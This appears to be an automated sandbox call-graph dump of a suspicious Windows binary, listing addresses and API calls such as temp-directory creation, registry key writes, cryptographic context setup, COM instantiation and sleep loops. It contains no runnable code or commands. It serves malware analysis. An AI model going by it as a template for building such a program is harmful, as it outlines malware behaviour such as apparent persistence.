39290->39291 39292 403c1c 39291->39292 39294 406c4c 39293->39294 39302 406c7e 39293->39302 40590 409c85 6 API calls 39294->40590 39296 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39298 406c90 39296->39298 39297 406c56 39297->39302 40591 409f97 42 API calls 39297->40591 39298->38858 39300 406c74 40592 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39300->40592 39302->39296 39304 402453 39303->39304 39304->39304 39305 402730 43 API calls 39304->39305 39306 402465 39305->39306 39306->38862 39308 40236b 39307->39308 39309 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39307->39309 39308->39309 39310 40cfaf 39 API calls 39308->39310 39309->38866 39311 4023aa 39310->39311 39312 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39311->39312 39313 40cfaf 39 API calls 39311->39313 39312->38866 39314 40242c 39313->39314 39316 401783 _unexpected 39315->39316 39317 409b4a 41 API calls 39316->39317 39318 40179a _unexpected 39317->39318 39318->38961 39320 4083b2 39319->39320 39328 4083ee 39319->39328 40593 409c85 6 API calls 39320->40593 39321 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39323 408400 39321->39323 39323->38969 39324 4083bc 39324->39328 40594 409f97 42 API calls 39324->40594 39326 4083e4 40595 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39326->40595 39328->39321 39330 40835e 39329->39330 39331 40832c 39329->39331 39333 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39330->39333 40596 409c85 6 API calls 39331->40596 39335 408370 39333->39335 39334 408336 39334->39330 40597 409f97 42 API calls 39334->40597 39335->38988 39337 408354 40598 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39337->40598 39340 4082e2 39339->39340 39341 40829d 39339->39341 39342 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39340->39342 40599 409c85 6 API calls 39341->40599 39344 4082f5 39342->39344 39344->39009 39345 4082a7 39345->39340 40600 409f97 42 API calls 39345->40600 39347 4082d8 40601 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39347->40601 39350 408d74 39349->39350 39351 4092d0 43 API calls 39350->39351 39352 4068ee 39351->39352 39353 408dc0 39352->39353 39354 408ddb 39353->39354 39356 408def __InternalCxxFrameHandler 39354->39356 40602 402810 43 API calls 3 library calls 39354->40602 39356->39049 40603 4090f0 39357->40603 39359 40691b 39359->39069 39361 408c6a 39360->39361 39362 408d2d 39361->39362 39366 408c7e 39361->39366 40626 4015d0 43 API calls 3 library calls 39362->40626 39363 408c8a __InternalCxxFrameHandler 39363->39210 39365 408d32 40627 401530 41 API calls 3 library calls 39365->40627 39366->39363 39368 408cd8 39366->39368 39369 408cf9 39366->39369 39368->39365 39371 408cdf 39368->39371 39376 408cee __InternalCxxFrameHandler 39369->39376 40625 401530 41 API calls 4 library calls 39369->40625 39370 408ce5 39372 40cfaf 39 API calls 39370->39372 39370->39376 40624 401530 41 API calls 4 library calls 39371->40624 39375 408d3c 39372->39375 39376->39210 39378 4107e2 GetSystemTimeAsFileTime 39377->39378 39379 404f9f 39378->39379 39380 4106a2 39 API calls 39379->39380 39381 404fa8 _unexpected 39380->39381 39382 409b4a 41 API calls 39381->39382 39389 404ffc _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39382->39389 39385 402730 43 API calls 39385->39389 39387 4092d0 43 API calls 39387->39389 39388 401e20 44 API calls 39388->39389 39389->39385 39389->39387 39389->39388 39390 4052d0 Sleep 39389->39390 39391 4058bd 39389->39391 39398 4052e0 _unexpected 39389->39398 40628 402470 39389->40628 40769 409c85 6 API calls 39389->40769 40770 409f97 42 API calls 39389->40770 40771 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39389->40771 39390->39389 39392 40cfaf 39 API calls 39391->39392 39393 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 39392->39393 39396 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39393->39396 39397 405a22 39396->39397 39399 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39396->39399 39401 40cfaf 39 API calls 39397->39401 39404 409b4a 41 API calls 39398->39404 39400 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39399->39400 39402 405a1e 39400->39402 39403 405a27 39401->39403 39402->39223 39405 4107e2 GetSystemTimeAsFileTime 39403->39405 39418 405315 __InternalCxxFrameHandler _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39404->39418 39406 405a7f 39405->39406 39407 4106a2 39 API calls 39406->39407 39408 405a88 Sleep 39407->39408 39409 402730 43 API calls 39408->39409 39421 405aba 39409->39421 39411 402730 43 API calls 39411->39418 39412 402730 43 API calls 39420 405c80 __InternalCxxFrameHandler _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39412->39420 39414 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39414->39412 39414->39420 39415 4092d0 43 API calls 39415->39418 39418->39391 39418->39411 39418->39415 39419 401e20 44 API calls 39418->39419 39425 40fb0d 15 API calls ___std_exception_copy 39418->39425 39427 405682 39418->39427 39431 408c40 43 API calls 39418->39431 39443 403410 41 API calls 39418->39443 39489 405687 39418->39489 40643 4035b0 CryptAcquireContextW 39418->40643 40667 402ec0 39418->40667 40772 409c85 6 API calls 39418->40772 40773 409f97 42 API calls 39418->40773 40774 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39418->40774 39419->39418 39423 403a90 43 API calls 39420->39423 39424 4107b2 43 API calls 39420->39424 39426 409b4a 41 API calls 39420->39426 39428 4061c5 39420->39428 39441 4092d0 43 API calls 39420->39441 39451 401e20 44 API calls 39420->39451 39452 40cfaf 39 API calls 39420->39452 39458 406192 Sleep 39420->39458 39465 402730 43 API calls 39420->39465 39470 40619e 39420->39470 39481 406c0b 39420->39481 39482 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39420->39482 40776 4025a0 41 API calls 39420->40776 40777 409c85 6 API calls 39420->40777 40778 409f97 42 API calls 39420->40778 40779 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39420->40779 39421->39414 40775 4025a0 41 API calls 39421->40775 39423->39420 39424->39420 39425->39418 39426->39420 39429 40577c CoUninitialize 39427->39429 39430 406c20 53 API calls 39428->39430 39435 405792 39429->39435 39432 4061ec 39430->39432 39431->39418 39436 402430 43 API calls 39432->39436 39438 4057ae CoUninitialize 39435->39438 39440 4061fc 39436->39440 39447 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39438->39447 39444 402360 39 API calls 39440->39444 39441->39420 39443->39418 39446 406210 39444->39446 39445 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39448 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39445->39448 39449 4062e5 39446->39449 39450 406218 39446->39450 39447->39391 39447->39445 39453 4058b6 39448->39453 40792 406ec0 53 API calls 2 library calls 39449->40792 39456 406288 39450->39456 39457 40622b 39450->39457 39451->39420 39452->39420 39453->39223 39455 4062ea 39461 402430 43 API calls 39455->39461 40787 406db0 53 API calls 2 library calls 39456->40787 40782 406ca0 53 API calls 2 library calls 39457->40782 39458->39420 39464 4062fa 39461->39464 39462 406230 39466 402430 43 API calls 39462->39466 39463 40628d 39467 402430 43 API calls 39463->39467 39468 402360 39 API calls 39464->39468 39465->39420 39469 406240 39466->39469 39471 40629d 39467->39471 39473 40630e 39468->39473 40783 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39469->40783 40780 408c10 43 API calls 39470->40780 40788 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39471->40788 39478 4063e4 39473->39478 39479 406316 39473->39479 39476 4062a6 39483 402360 39 API calls 39476->39483 39477 4061aa 39484 402360 39 API calls 39477->39484 40801 407260 53 API calls 2 library calls 39478->40801 40793 406f40 53 API calls 2 library calls 39479->40793 39480 406249 39486 402360 39 API calls 39480->39486 39487 403c20 21 API calls 39481->39487 39482->39458 39491 4062ae 39483->39491 39492 4061b2 39484->39492 39494 406251 39486->39494 39495 406c10 39487->39495 39490 40571b Sleep 39489->39490 39500 40574a Sleep 39489->39500 40723 100010a3 39489->40723 40726 10001f20 39489->40726 39490->39427 39490->39489 40789 406e40 53 API calls 2 library calls 39491->40789 39498 402360 39 API calls 39492->39498 39493 40631b 39506 402430 43 API calls 39493->39506 40784 406d30 53 API calls 2 library calls 39494->40784 39496 4063e9 39504 402430 43 API calls 39496->39504 39502 4061ba 39498->39502 39500->39427 39501 4062b3 39510 402430 43 API calls 39501->39510 40781 4017d0 CoUninitialize 39502->40781 39503 406256 39509 402430 43 API calls 39503->39509 39507 4063f9 39504->39507 39508 40632b 39506->39508 39517 402360 39 API calls 39507->39517 40794 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39508->40794 39513 406266 39509->39513 39514 4062c3 39510->39514 39512 406334 39515 402360 39 API calls 39512->39515 40785 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39513->40785 40790 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39514->40790 39519 40633c 39515->39519 39521 40640d 39517->39521 40795 406fc0 53 API calls 2 library calls 39519->40795 39520 40626f 39524 402360 39 API calls 39520->39524 39525 4064ce 39521->39525 40802 4072e0 53 API calls 2 library calls 39521->40802 39522 4062cc 39526 402360 39 API calls 39522->39526 39528 406277 39524->39528 40810 407600 53 API calls 2 library calls 39525->40810 39531 4062d4 39526->39531 39527 406341 39537 402430 43 API calls 39527->39537 40786 408c10 43 API calls 39528->40786 40791 408c10 43 API calls 39531->40791 39533 40641a 39540 402430 43 API calls 39533->39540 39534 4064d8 39541 402430 43 API calls 39534->39541 39536 406283 39538 40686e 39536->39538 40848 402330 43 API calls 39536->40848 39539 406351 39537->39539 39543 401770 41 API calls 39538->39543 40796 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39539->40796 39545 40642a 39540->39545 39546 4064e8 39541->39546 39547 406881 39543->39547 40803 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39545->40803 39554 402360 39 API calls 39546->39554 39550 408380 53 API calls 39547->39550 39548 40635a 39551 402360 39 API calls 39548->39551 39555 40688a 39550->39555 39556 406362 39551->39556 39552 406433 39553 402360 39 API calls 39552->39553 39557 40643b 39553->39557 39558 4064fc 39554->39558 39566 402430 43 API calls 39555->39566 40797 407040 53 API calls 2 library calls 39556->40797 40804 407360 53 API calls 2 library calls 39557->40804 39561 4065e3 39558->39561 40811 407680 53 API calls 2 library calls 39558->40811 40821 407a20 53 API calls 2 library calls 39561->40821 39562 406367 39570 402430 43 API calls 39562->39570 39564 406440 39573 402430 43 API calls 39564->39573 39569 40689d 39566->39569 39567 4065ed 39575 402430 43 API calls 39567->39575 39568 406509 39577 402430 43 API calls 39568->39577 39571 408300 53 API calls 39569->39571 39572 406377 39570->39572 39574 4068a8 39571->39574 39581 402360 39 API calls 39572->39581 39576 406450 39573->39576 39584 402430 43 API calls 39574->39584 39578 4065fd 39575->39578 40805 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39576->40805 39580 406519 39577->39580 39592 402360 39 API calls 39578->39592 40812 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39580->40812 39586 40638b 39581->39586 39582 406459 39587 402360 39 API calls 39582->39587 39585 4068bb 39584->39585 39589 408260 53 API calls 39585->39589 39590 4063ac 39586->39590 39591 40638f 39586->39591 39593 406461 39587->39593 39588 406522 39594 402360 39 API calls 39588->39594 39595 4068c6 39589->39595 40799 407150 53 API calls 2 library calls 39590->40799 40798 4070d0 53 API calls 2 library calls 39591->40798 39597 406611 39592->39597 40806 4073e0 53 API calls 2 library calls 39593->40806 39599 40652a 39594->39599 39610 402430 43 API calls 39595->39610 39603 406693 39597->39603 39604 406615 39597->39604 40813 407700 53 API calls 2 library calls 39599->40813 39601 4063b1 39614 402430 43 API calls 39601->39614 39602 406394 39616 402430 43 API calls 39602->39616 40828 407c40 53 API calls 2 library calls 39603->40828 40822 407ab0 53 API calls 2 library calls 39604->40822 39605 406466 39613 402430 43 API calls 39605->39613 39609 40652f 39618 402430 43 API calls 39609->39618 39615 4068d9 39610->39615 39611 406698 39624 402430 43 API calls 39611->39624 39612 40661a 39625 402430 43 API calls 39612->39625 39617 406476 39613->39617 39619 4063c1 39614->39619 39620 408d60 43 API calls 39615->39620 39621 4063a4 39616->39621 39632 402360 39 API calls 39617->39632 39622 40653f 39618->39622 39634 402360 39 API calls 39619->39634 39623 4068ee 39620->39623 40847 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39621->40847 40814 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39622->40814 39628 408dc0 43 API calls 39623->39628 39630 4066a8 39624->39630 39626 40662a 39625->39626 40823 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39626->40823 39635 406906 39628->39635 39643 402360 39 API calls 39630->39643 39638 40648a 39632->39638 39633 406548 39639 402360 39 API calls 39633->39639 39640 4063d5 39634->39640 39641 408e70 43 API calls 39635->39641 39636 406855 39636->39536 39642 402360 39 API calls 39636->39642 39637 406633 39644 402360 39 API calls 39637->39644 39645 406498 39638->39645 39646 40648e 39638->39646 39647 406550 39639->39647 39640->39536 40800 4071e0 53 API calls 2 library calls 39640->40800 39648 40691b 39641->39648 39642->39536 39649 4066bc 39643->39649 39650 40663b 39644->39650 40808 4074f0 53 API calls 2 library calls 39645->40808 40807 407470 53 API calls 2 library calls 39646->40807 40815 407780 53 API calls 2 library calls 39647->40815 39655 408dc0 43 API calls 39648->39655 39656 4066c0 39649->39656 39657 40673e 39649->39657 40824 407b30 53 API calls 2 library calls 39650->40824 39661 406933 39655->39661 40829 407cd0 53 API calls 2 library calls 39656->40829 40835 407e50 53 API calls 2 library calls 39657->40835 39659 406555 39670 402430 43 API calls 39659->39670 39660 40649d 39671 402430 43 API calls 39660->39671 39665 408e70 43 API calls 39661->39665 39664 406640 39673 402430 43 API calls 39664->39673 39666 406948 39665->39666 39669 408dc0 43 API calls 39666->39669 39667 406743 39677 402430 43 API calls 39667->39677 39668 4066c5 39678 402430 43 API calls 39668->39678 39672 406960 39669->39672 39674 406565 39670->39674 39675 4064ad 39671->39675 39676 402360 39 API calls 39672->39676 39679 406650 39673->39679 40816 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39674->40816 39687 402360 39 API calls 39675->39687 39681 40696e 39676->39681 39682 406753 39677->39682 39683 4066d5 39678->39683 40825 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39679->40825 39688 402360 39 API calls 39681->39688 39698 402360 39 API calls 39682->39698 40830 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39683->40830 39685 40656e 39686 402360 39 API calls 39685->39686 39691 406576 39686->39691 39692 4064c1 39687->39692 39693 406979 39688->39693 39690 406659 39695 402360 39 API calls 39690->39695 40817 407800 53 API calls 2 library calls 39691->40817 39692->39536 40809 407580 53 API calls 2 library calls 39692->40809 39697 402360 39 API calls 39693->39697 39694 4066de 39699 402360 39 API calls 39694->39699 39700 406661 39695->39700 39703 406984 39697->39703 39704 406767 39698->39704 39705 4066e6 39699->39705 40826 407bc0 53 API calls 2 library calls 39700->40826 39701 40657b 39717 402430 43 API calls 39701->39717 39708 402360 39 API calls 39703->39708 39709 40676b 39704->39709 39710 4067be 39704->39710 40831 407d50 53 API calls 2 library calls 39705->40831 39707 406666 39720 402430 43 API calls 39707->39720 39714 40698f 39708->39714 40836 407ee0 53 API calls 2 library calls 39709->40836 40841 408060 53 API calls 2 library calls 39710->40841 39712 4066eb 39723 402430 43 API calls 39712->39723 39719 402360 39 API calls 39714->39719 39716 406770 39726 402430 43 API calls 39716->39726 39721 40658b 39717->39721 39718 4067c3 39729 402430 43 API calls 39718->39729 39722 40699a 39719->39722 39724 406676 39720->39724 39734 402360 39 API calls 39721->39734 39725 402360 39 API calls 39722->39725 39727 4066fb 39723->39727 40827 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39724->40827 39730 4069a5 39725->39730 39731 406780 39726->39731 40832 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39727->40832 39735 4067d3 39729->39735 39736 402360 39 API calls 39730->39736 40837 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39731->40837 39733 40667f 39740 402360 39 API calls 39733->39740 39741 40659f 39734->39741 39750 402360 39 API calls 39735->39750 39737 4069b0 39736->39737 39742 402360 39 API calls 39737->39742 39739 406704 39744 402360 39 API calls 39739->39744 39740->39536 39745 4065a8 39741->39745 40818 407890 53 API calls 2 library calls 39741->40818 39786 4069bf 39742->39786 39743 406789 39747 402360 39 API calls 39743->39747 39748 40670c 39744->39748 40819 407910 53 API calls 2 library calls 39745->40819 39752 406791 39747->39752 40833 407dd0 53 API calls 2 library calls 39748->40833 39754 4067e7 39750->39754 39751 4065b2 39760 402430 43 API calls 39751->39760 40838 407f60 53 API calls 2 library calls 39752->40838 39754->39536 40842 4080e0 53 API calls 2 library calls 39754->40842 39756 406711 39762 402430 43 API calls 39756->39762 39758 406796 39764 402430 43 API calls 39758->39764 39759 4067f0 39766 402430 43 API calls 39759->39766 39761 4065c2 39760->39761 39771 402360 39 API calls 39761->39771 39765 406721 39762->39765 39763 406a1e Sleep 39763->39786 39767 4067a6 39764->39767 40834 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39765->40834 39770 406800 39766->39770 40839 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39767->40839 39769 40672a 39774 402360 39 API calls 39769->39774 40843 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39770->40843 39776 4065d6 39771->39776 39773 4067af 39778 402360 39 API calls 39773->39778 39774->39536 39776->39536 40820 4079a0 53 API calls 2 library calls 39776->40820 39777 402430 43 API calls 39777->39786 39780 4067b7 39778->39780 39779 406809 39781 402360 39 API calls 39779->39781 40840 407fe0 53 API calls 2 library calls 39780->40840 39784 406811 39781->39784 40844 408160 53 API calls 2 library calls 39784->40844 39786->39763 39786->39777 39787 406a27 39786->39787 39791 406a16 39786->39791 39788 402360 39 API calls 39787->39788 39790 406a2f 39788->39790 39789 406816 39797 402430 43 API calls 39789->39797 39793 408c40 43 API calls 39790->39793 39794 402360 39 API calls 39791->39794 39792 4067bc 39795 402430 43 API calls 39792->39795 39796 406a40 39793->39796 39794->39763 39795->39621 39799 408c40 43 API calls 39796->39799 39798 406826 39797->39798 40845 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39798->40845 39801 406a59 39799->39801 39803 408c40 43 API calls 39801->39803 39802 40682f 39804 402360 39 API calls 39802->39804 39806 406837 39804->39806 40846 4081e0 53 API calls 2 library calls 39806->40846 39861 40b530 _unexpected 39860->39861 39862 403d7b GetTempPathA 39861->39862 39863 403db7 39862->39863 39863->39863 39864 402730 43 API calls 39863->39864 39872 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39864->39872 39867 4092d0 43 API calls 39867->39872 39868 403f02 CreateDirectoryA Sleep 39870 403f30 _unexpected 39868->39870 39868->39872 39869 404f20 39871 40cfaf 39 API calls 39869->39871 39874 409b4a 41 API calls 39870->39874 39873 404f43 39871->39873 39872->39867 39872->39868 39872->39869 41136 410681 39872->41136 41139 403c30 39872->41139 39875 4107e2 GetSystemTimeAsFileTime 39873->39875 39878 403f64 _unexpected 39874->39878 39876 404f9f 39875->39876 39877 4106a2 39 API calls 39876->39877 39879 404fa8 _unexpected 39877->39879 39882 40402b 39878->39882 41154 409c85 6 API calls 39878->41154 39883 409b4a 41 API calls 39879->39883 39881 403fe2 39881->39882 41155 409f97 42 API calls 39881->41155 39884 402730 43 API calls 39882->39884 39909 404ffc _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39883->39909 39886 4040a2 39884->39886 39888 4092d0 43 API calls 39886->39888 39887 40401e 41156 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39887->41156 39890 4040cd 39888->39890 39890->39869 39891 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39890->39891 39896 404207 39891->39896 41157 409c85 6 API calls 39891->41157 39894 4041b1 39894->39896 41158 409f97 42 API calls 39894->41158 39899 402730 43 API calls 39896->39899 39897 402730 43 API calls 39897->39909 39902 404262 39899->39902 39900 4041fa 41159 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39900->41159 39905 4092d0 43 API calls 39902->39905 39903 4092d0 43 API calls 39903->39909 39906 404281 39905->39906 39908 401e20 44 API calls 39906->39908 39907 401e20 44 API calls 39907->39909 39914 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39908->39914 39909->39897 39909->39903 39909->39907 39910 4052d0 Sleep 39909->39910 39911 4058bd 39909->39911 39916 402470 43 API calls 39909->39916 39922 4052e0 _unexpected 39909->39922 41173 409c85 6 API calls 39909->41173 41174 409f97 42 API calls 39909->41174 41175 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39909->41175 39910->39909 39913 40cfaf 39 API calls 39911->39913 39912 4043e7 _unexpected 39918 409b4a 41 API calls 39912->39918 39915 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 39913->39915 39914->39912 41145 4021f0 39914->41145 39919 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39915->39919 39916->39909 39928 40441b _unexpected 39918->39928 39921 405a22 39919->39921 39923 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39919->39923 39925 40cfaf 39 API calls 39921->39925 39929 409b4a 41 API calls 39922->39929 39924 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 39923->39924 39926 405a1e 39924->39926 39927 405a27 39925->39927 39926->39224 39931 4107e2 GetSystemTimeAsFileTime 39927->39931 39934 4044fc 39928->39934 41160 409c85 6 API calls 39928->41160 39968 405315 __InternalCxxFrameHandler _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39929->39968 39933 405a7f 39931->39933 39932 4044a6 39932->39934 41161 409f97 42 API calls 39932->41161 39936 4106a2 39 API calls 39933->39936 39937 402730 43 API calls 39934->39937 39939 405a88 Sleep 39936->39939 39940 40455d 39937->39940 39938 4044ef 41162 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39938->41162 39942 402730 43 API calls 39939->39942 39943 4092d0 43 API calls 39940->39943 39965 405aba 39942->39965 39946 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39943->39946 39945 402730 43 API calls 39945->39968 39953 4046c2 39946->39953 41163 409c85 6 API calls 39946->41163 39947 402730 43 API calls 39962 405c80 __InternalCxxFrameHandler _unexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39947->39962 39950 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39950->39947 39950->39962 39951 40466c 39951->39953 41164 409f97 42 API calls 39951->41164 39952 4092d0 43 API calls 39952->39968 39956 402730 43 API calls 39953->39956 39958 40471d 39956->39958 39960 4092d0 43 API calls 39958->39960 39959 4046b5 41165 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39959->41165 39964 40473c 39960->39964 39961 401e20 44 API calls 39961->39968 39967 403a90 43 API calls 39962->39967 39969 4107b2 43 API calls 39962->39969 39972 409b4a 41 API calls 39962->39972 39973 4061c5 39962->39973 39999 4092d0 43 API calls 39962->39999 40013 40cfaf 39 API calls 39962->40013 40015 401e20 44 API calls 39962->40015 40023 406192 Sleep 39962->40023 40036 402730 43 API calls 39962->40036 40044 40619e 39962->40044 40056 406c0b 39962->40056 40057 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39962->40057 41180 4025a0 41 API calls 39962->41180 41181 409c85 6 API calls 39962->41181 41182 409f97 42 API calls 39962->41182 41183 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39962->41183 39970 401e20 44 API calls 39964->39970 39965->39950 41179 4025a0 41 API calls 39965->41179 39967->39962 39968->39911 39968->39945 39968->39952 39968->39961 39971 40fb0d 15 API calls ___std_exception_copy 39968->39971 39975 405682 39968->39975 39982 408c40 43 API calls 39968->39982 39988 4035b0 52 API calls 39968->39988 39994 402ec0 93 API calls 39968->39994 40028 403410 41 API calls 39968->40028 40064 405687 39968->40064 41176 409c85 6 API calls 39968->41176 41177 409f97 42 API calls 39968->41177 41178 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39968->41178 39969->39962 39974 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39970->39974 39971->39968 39972->39962 39980 406c20 53 API calls 39973->39980 39976 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39974->39976 39977 4021f0 8 API calls 39974->39977 39978 40577c CoUninitialize 39975->39978 39985 404dc1 CoUninitialize 39976->39985 39979 4048b8 SHGetFolderPathA 39977->39979 39989 405792 39978->39989 39979->39976 39981 4048d5 39979->39981 39983 4061ec 39980->39983 39990 40495a 39981->39990 41166 409c85 6 API calls 39981->41166 39982->39968 39991 402430 43 API calls 39983->39991 39998 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39985->39998 39987 404911 39987->39990 41167 409f97 42 API calls 39987->41167 39988->39968 39996 4057ae CoUninitialize 39989->39996 39995 402730 43 API calls 39990->39995 39997 4061fc 39991->39997 39994->39968 40006 4049bd 39995->40006 40009 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39996->40009 40004 402360 39 API calls 39997->40004 40003 404e42 CoUninitialize 39998->40003 39999->39962 40000 40494d 41168 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40000->41168 40022 404e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40003->40022 40007 406210 40004->40007 40005 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40010 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40005->40010 40026 4049f1 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40006->40026 41169 409590 43 API calls 4 library calls 40006->41169 40011 4062e5 40007->40011 40012 406218 40007->40012 40009->39911 40009->40005 40014 4058b6 40010->40014 41196 406ec0 53 API calls 2 library calls 40011->41196 40019 406288 40012->40019 40020 40622b 40012->40020 40013->39962 40014->39224 40015->39962 40017 4099d7 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 40024 404f19 40017->40024 40018 4062ea 40031 402430 43 API calls 40018->40031 41191 406db0 53 API calls 2 library calls 40019->41191 41186 406ca0 53 API calls 2 library calls 40020->41186 40021 404bc3 CoInitialize CoCreateInstance 40021->39976 40055 404c68 40021->40055 40022->40017 40023->39962 40024->39224 40026->40021 41170 409c85 6 API calls 40026->41170 40028->39968 40035 4062fa 40031->40035 40032 406230 40038 402430 43 API calls 40032->40038 40033 404b87 40033->40021 41171 409f97 42 API calls 40033->41171 40034 40628d 40040 402430 43 API calls 40034->40040 40041 402360 39 API calls 40035->40041 40036->39962 40042 406240 40038->40042 40039 404bb6 41172 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40039->41172 40045 40629d 40040->40045 40047 40630e 40041->40047 41187 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40042->41187 41184 408c10 43 API calls 40044->41184 41192 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40045->41192 40052 4063e4 40047->40052 40053 406316 40047->40053 40050 4062a6 40058 402360 39 API calls 40050->40058 40051 4061aa 40059 402360 39 API calls 40051->40059 41205 407260 53 API calls 2 library calls 40052->41205 41197 406f40 53 API calls 2 library calls 40053->41197 40054 406249 40061 402360 39 API calls 40054->40061 40075 404cb5 MultiByteToWideChar 40055->40075 40076 404ce3 CoUninitialize 40055->40076 40062 403c20 21 API calls 40056->40062 40057->40023 40066 4062ae 40058->40066 40067 4061b2 40059->40067 40069 406251 40061->40069 40070 406c10 40062->40070 40065 40571b Sleep 40064->40065 40077 40574a Sleep 40064->40077 40436 10001f20 70 API calls 40064->40436 40437 100010a3 CoUninitialize 40064->40437 40065->39975 40065->40064 41193 406e40 53 API calls 2 library calls 40066->41193 40073 402360 39 API calls 40067->40073 40068 40631b 40084 402430 43 API calls 40068->40084 41188 406d30 53 API calls 2 library calls 40069->41188 40071 4063e9 40081 402430 43 API calls 40071->40081 40079 4061ba 40073->40079 40075->40076 